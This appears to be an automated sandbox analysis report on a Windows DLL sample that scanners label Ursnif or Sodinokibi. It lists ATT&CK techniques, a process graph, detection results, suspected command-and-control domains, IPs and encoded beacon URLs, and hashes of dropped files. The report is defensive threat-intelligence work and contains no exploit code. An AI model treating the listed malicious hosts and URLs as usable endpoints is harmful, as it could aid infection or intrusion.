            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 481120 Sample: MGrYFpGLQ7.dll Startdate: 10/09/2021 Architecture: WINDOWS Score: 88 32 ocsp.sca1b.amazontrust.com 2->32 34 gstatistics.co 2->34 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 2 other signatures 2->56 8 loaddll32.exe 1 2->8         started        signatures3 process4 signatures5 62 Writes or reads registry keys via WMI 8->62 64 Writes registry values via WMI 8->64 11 cmd.exe 1 8->11         started        13 regsvr32.exe 8 8->13         started        16 iexplore.exe 1 100 8->16         started        18 7 other processes 8->18 process6 signatures7 20 rundll32.exe 11->20         started        66 Writes or reads registry keys via WMI 13->66 68 Writes registry values via WMI 13->68 23 iexplore.exe 16->23         started        26 iexplore.exe 16->26         started        28 iexplore.exe 16->28         started        30 2 other processes 16->30 process8 dnsIp9 58 Found stalling execution ending in API Sleep call 20->58 60 Writes registry values via WMI 20->60 36 edge.gycpi.b.yahoodns.net 87.248.118.22, 443, 49819, 49820 YAHOO-DEBDE United Kingdom 23->36 38 geolocation.onetrust.com 104.20.184.68, 443, 49763, 49764 CLOUDFLARENETUS United States 23->38 48 8 other IPs or domains 23->48 40 ocsp.sca1b.amazontrust.com 13.225.29.132, 49859, 49860, 49863 AMAZON-02US United States 26->40 42 192.168.2.1 unknown unknown 26->42 44 95.181.198.158, 80 DTLNRU Russian Federation 28->44 46 gstatistics.co 185.186.142.136, 80 ASKONTELRU Russian Federation 28->46 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            MGrYFpGLQ7.dll82%VirustotalBrowse
            MGrYFpGLQ7.dll59%MetadefenderBrowse
            MGrYFpGLQ7.dll89%ReversingLabsWin32.Ransomware.Sodinokibi
            MGrYFpGLQ7.dll100%AviraTR/AD.Ursnif.olrue
            MGrYFpGLQ7.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.1.rundll32.exe.510000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            16.2.rundll32.exe.4350000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            0.1.loaddll32.exe.5f0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.2.rundll32.exe.510000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            2.2.regsvr32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            21.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.2.rundll32.exe.4ca0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            0.2.loaddll32.exe.5f0000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            18.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            2.1.regsvr32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            12.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            27.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.1.loaddll32.exe.5f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            16.1.rundll32.exe.8f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.2.rundll32.exe.4080000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            12.2.rundll32.exe.4c00000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            21.2.rundll32.exe.4fd0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            6.2.rundll32.exe.47b0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            9.2.rundll32.exe.4bf0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            3.1.rundll32.exe.510000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            18.2.rundll32.exe.6770000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            0.2.loaddll32.exe.c70000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            0.1.loaddll32.exe.5f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            9.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.1.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            2.2.regsvr32.exe.3180000.2.unpack100%AviraHEUR/AGEN.1108168Download File
            16.1.rundll32.exe.8f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://ocsp.sca1b.amazontrust.com/images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi0%Avira URL Cloudsafe
            http://ocsp.sca1b.amazontrust.com/images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi0%Avira URL Cloudsafe
            http://ocsp.sca1b.amazontrust.com/images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            		23.211.6.95
            		truefalse
              		high
              ocsp.sca1b.amazontrust.com
              		13.225.29.132
              		truefalse
                		high
                gstatistics.co
                		185.186.142.136
                		truefalse
                  		high
                  hblg.media.net
                  		23.211.6.95
                  		truefalse
                    		high
                    lg3.media.net
                    		23.211.6.95
                    		truefalse
                      		high
                      geolocation.onetrust.com
                      		104.20.184.68
                      		truefalse
                        		high
                        edge.gycpi.b.yahoodns.net
                        		87.248.118.22
                        		truefalse
                          		high
                          s.yimg.com
                          		unknown
                          		unknownfalse
                            		high
                            web.vortex.data.msn.com
                            		unknown
                            		unknownfalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                srtb.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  cvision.media.net
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://ocsp.sca1b.amazontrust.com/images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avitrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationfalse
                                      		high
                                      http://ocsp.sca1b.amazontrust.com/images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avitrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://s.yimg.com/lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpgfalse
                                        		high
                                        http://ocsp.sca1b.amazontrust.com/images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avitrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        13.225.29.132
                                        		ocsp.sca1b.amazontrust.comUnited States
                                        		16509AMAZON-02USfalse
                                        104.20.184.68
                                        		geolocation.onetrust.comUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        95.181.198.158
                                        		unknownRussian Federation
                                        		49063DTLNRUfalse
                                        87.248.118.22
                                        		edge.gycpi.b.yahoodns.netUnited Kingdom
                                        		203220YAHOO-DEBDEfalse
                                        185.186.142.136
                                        		gstatistics.coRussian Federation
                                        		204490ASKONTELRUfalse

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:481120
                                        Start date:10.09.2021
                                        Start time:11:32:24
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 14m 24s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:MGrYFpGLQ7.dll
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:46
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal88.troj.evad.winDLL@51/187@14/6
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 74.4% (good quality ratio 69.8%)
                                        • Quality average: 78.1%
                                        • Quality standard deviation: 29.8%
                                        HCA Information:
                                        • Successful, ratio: 84%
                                        • Number of executed functions: 216
                                        • Number of non-executed functions: 270
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .dll
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.203.80.193, 204.79.197.203, 131.253.33.200, 13.107.22.200, 80.67.82.240, 80.67.82.209, 23.211.4.86, 65.55.44.109, 23.211.6.95, 20.50.102.62, 152.199.19.161, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):13
                                        Entropy (8bit):2.469670487371862
                                        Encrypted:false
                                        SSDEEP:3:D90aKb:JFKb
                                        MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                        SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                        SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                        SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <root></root>
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):1979
                                        Entropy (8bit):4.894078869642119
                                        Encrypted:false
                                        SSDEEP:48:LuFsuFsuFFFsuFsuFsuFscFscFvFscFscFyFscFsDFsDFsDFsDFsDFigFsDFigFc:CFnFnFFFnFnFnFhFhFvFhFhFyFhFaFag
                                        MD5:100B5B5D096FAFBA765C2A1E1FC7B857
                                        SHA1:66BEE5C30860054D3B1446DD31A41301AFC09A00
                                        SHA-256:63FF314364FB7EC101777E5C8AD757FD5E7376D6DFF2C60AC031524EA03204B0
                                        SHA-512:39760EC31E4851D3C7CB30BD03FCCA1506D068770170B0C7E78667A97F65F3089B2F86626AD475FEA6CA5791C679E6A34EB0304AC36F4604CF90D34FF8F6FC5B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /><item name="mntest" value="mntest" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1589958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1590958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1590958464" htime="30910066" /><item name="mntest" value="mntest" ltime="1590958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1590958464" htime="30910066" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1590958464" htime="30910066"
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{97212EC2-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):548952
                                        Entropy (8bit):2.912295206751126
                                        Encrypted:false
                                        SSDEEP:768:sqvpzeb3kq+X2RQjD92J5OBDePxXzQ5RMnGp79lduoBhIC9zz51D4qMt34RR5e3G:x
                                        MD5:8F07F7E2E7034239D814BFC7E1AA0D83
                                        SHA1:6F0BBC545FEA3CF38BB8262C8F97D44F413B6CCE
                                        SHA-256:21999DAA2DF2972E522EFAC6A10387FD21EB90873EC087DB25565BA7E5061EE5
                                        SHA-512:789837447FB127598E3FCA6AD8CB55B1F9A76CCC1ECE6187BA6A7DE0F56BB7DC72075DDAFCB7A64AA72DBAA33C77E0940481E9CC6E98E635EF1B3EFD02CD3C02
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC4-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):364456
                                        Entropy (8bit):3.6287170988625705
                                        Encrypted:false
                                        SSDEEP:3072:pZ/2Bfcdmu5kgTzGtUZ/2Bfc+mu5kgTzGtYZ/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kE:wjyXl
                                        MD5:6E0E237D75EC5461E223CCD3747F1F70
                                        SHA1:CB49F7C24F0382D8FD9A1945DC0C02CA835EC2AA
                                        SHA-256:4F2D1F6945031D80459E94C8CBE93EFBE78E58B688055998D142C4D9136A2479
                                        SHA-512:A08646A03646074DC1B83274D360A1003172E91F5716E5E0EC25C5F77B259018F7E92CF204C552F0A6F92F1C8ED1940DB5FCB44272D3C6FFAEFE0860F6F44698
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC6-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27388
                                        Entropy (8bit):1.8496200615655867
                                        Encrypted:false
                                        SSDEEP:192:rXZ4QK6Ukzbjx2ASWgM8OPt4bRPt4etpA:rJh15zHgAR13yu
                                        MD5:05A9FBD89AD410559088153DF793E95A
                                        SHA1:F8A04B0DBE00428C2558682F105D794345F6ABBD
                                        SHA-256:E5931A09C796A8EE5C43790086492931D3FB8E7D4158570230CD9B5CE47EB567
                                        SHA-512:A640FA0BDA487E3EBAC12EE00820B6A1C43EBF9142BD2043801F01D1EFAD33225D34525CCCA24629C3E0856C65ECCBC0819C04A9185AA80A6A26E418AA07B9F4
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{97212EC8-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27216
                                        Entropy (8bit):1.8581390295123945
                                        Encrypted:false
                                        SSDEEP:96:rVZ2Qi6YBSa0j52xW6MCaado70xedo7jA:rVZ2Qi6YkPj52xW6MCaad1xedmA
                                        MD5:D081FCF7713E9A1824B1C626DC5F3254
                                        SHA1:BD57F9302A70F5B53D8F11C3FE88EA9B0C508D57
                                        SHA-256:EE66B9F80615ECDA6B02D9911E5FEBB5AB3404AF87E116E76D46BE4C77D1E9DE
                                        SHA-512:0DDAD44B30A2FC016B904395D63167728BA6FADF6258766CC78B8E8E1A831ECBAB98D566FB4F838D372327F70FBF6488214EAA9265947FD4A16B720E89C08444
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D2B8B4E-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5754670009647667
                                        Encrypted:false
                                        SSDEEP:48:IwtGcproGwpacG4pQIGrapbSxGQpB2GHHpcAVTGUpG:rzZwQ86WBSLj12AXA
                                        MD5:AB5683FC22D2315C1F43020D2895D880
                                        SHA1:87DFC73F1575C047697623483E0AAB7F5FAE62B6
                                        SHA-256:A4ACF6C0F085C9E0DDFCBDA7E22D483A0085D35B3C15F659AB7996A6A7036225
                                        SHA-512:8655CDD4337C31B5A0EFBC672177C8A6C19474ABA9A3630F64D8183620D548AC5425B3ED3075AC90CA06D6BDA0C41A0BBFF613C48AF3A21593E90328D7056562
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D2B8B50-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27456
                                        Entropy (8bit):1.8692190494520904
                                        Encrypted:false
                                        SSDEEP:96:r9ZeQm68BSejR2RW+M6KPYDCx2PYDC0qA:r9ZeQm68kejR2RW+M6KQmx2QmdA
                                        MD5:C547AFE53F9D75140BF42C9B8017A4FA
                                        SHA1:DCB4091076C3A35E4EE495CFF4280E71C9C4D5C0
                                        SHA-256:285C45598BB5EB06C8E030F6367AA55F1E24BFDFFD68A99757DE9D3BF87456DF
                                        SHA-512:346BDCF20A63E7E2319634F306E8C60EC3E47F4A4D07225BCF06A6E5ED889C3B54518DE8DA90D9A562DCDC4FE0F9446F3EA538D0EFA2DF6D5F56C7836F1E63A5
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3351-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):16984
                                        Entropy (8bit):1.5730104268086544
                                        Encrypted:false
                                        SSDEEP:48:IwMGcprxGwpaY0G4pQ+mGrapbSktGQpBGGHHpcjTGUpG:rQZrQYE6+oBS0jF29A
                                        MD5:FDA040A48E80BB91E6E03095E6FA99B1
                                        SHA1:322C58A60BDF317CEE5C8CDF775BBEFBD68B779A
                                        SHA-256:BF6A987A4010E3750ADB12F6652D8E5ED20F89AF19C0018324CE66D9177092D6
                                        SHA-512:A319F1B517BFD5F9CA3E171CFCEB0C6A4ADB52788B28B12137C03D2E81B99578BC37E694C9682D5972BEDC2291AAE96A2B03FB2E5971D2FB6F7B019712F482E6
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3353-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27392
                                        Entropy (8bit):1.851425793435613
                                        Encrypted:false
                                        SSDEEP:96:rmZlQR6C0BSkjh21W8M3KEGZ7xqMREGZ7xq0GZJA:rmZlQR6C0kkjh21W8M3KL74MRL74bJA
                                        MD5:39517137A4D08785B85BC823B916EFBA
                                        SHA1:C7C77E6A96F89C12333E0C956EDDF3675BF53AED
                                        SHA-256:9A5CC18009E19F3047058DE44EDF67D6985DE52904A5C877BC8C43B53B67D80C
                                        SHA-512:AAB5D6784262D3C5134B59ADF3C90E9483C2F731E3B6FA4DFDF6F15D9F009296BE01BE6514C5D32C6BFA8C90E61FA511BEE1CA72C9DF969AC43939BDB8116F07
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3355-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):24632
                                        Entropy (8bit):1.7253076886306955
                                        Encrypted:false
                                        SSDEEP:48:IwmGcpr/GwpaDG4pQnGrapbSXGQpBKGHHpckQTGUp8kpGGzYpmklQFGopwWlYYYa:r6ZJQ167BShjR2BW5MByjYr4Dg
                                        MD5:6AB092D3A42B4F044F7C46CB9EC60610
                                        SHA1:68A89971B446E145567C932D48FFCAE52944E672
                                        SHA-256:0C6718229D1A44EFF1366819C57F9BA1CC4C3CCA39203D80F8AAC73F95AECE34
                                        SHA-512:D54D91755A4DB9C311720FB5266F9816617289A6480FFC1D3228B68B4D19C1FCF5D8EAEACFCC6164D3CDA3BE34F267E6B27E0AD8595A2DCD0A6849BA356504D3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A40F3357-1265-11EC-90E5-ECF4BB570DC9}.dat
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:Microsoft Word Document
                                        Category:dropped
                                        Size (bytes):27384
                                        Entropy (8bit):1.8489960886864234
                                        Encrypted:false
                                        SSDEEP:48:Iw5GcprMGwpanG4pQnGrapbS+GQpBOGHHpcDTGUp8sGzYpmk3Gopw+7+xoVKmQoN:rfZkQJ67BSWjd2dW4M4yGVKXRGVKhxA
                                        MD5:CBB501CB3A3718EEAC50366B0BCD043F
